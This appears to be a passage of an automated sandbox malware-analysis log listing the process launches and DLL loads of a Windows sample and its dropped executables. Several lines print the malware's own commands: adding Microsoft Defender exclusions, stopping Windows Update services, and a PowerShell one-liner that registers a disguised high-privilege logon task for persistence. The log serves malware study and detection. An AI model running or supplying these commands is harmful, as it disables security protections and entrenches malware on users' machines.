                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\2314627202.exe C:\Users\user\AppData\Local\Temp\2314627202.exeJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\1091722296.exe C:\Users\user\AppData\Local\Temp\1091722296.exeJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\146916724.exe C:\Users\user\AppData\Local\Temp\146916724.exeJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauservJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /waitJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeProcess created: C:\Users\user\AppData\Local\Temp\1239611256.exe C:\Users\user\AppData\Local\Temp\1239611256.exe
                                Source: C:\Users\user\AppData\Local\Temp\1239611256.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\AppData\Local\Temp\1239611256.exeProcess created: unknown unknown
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\2314627202.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
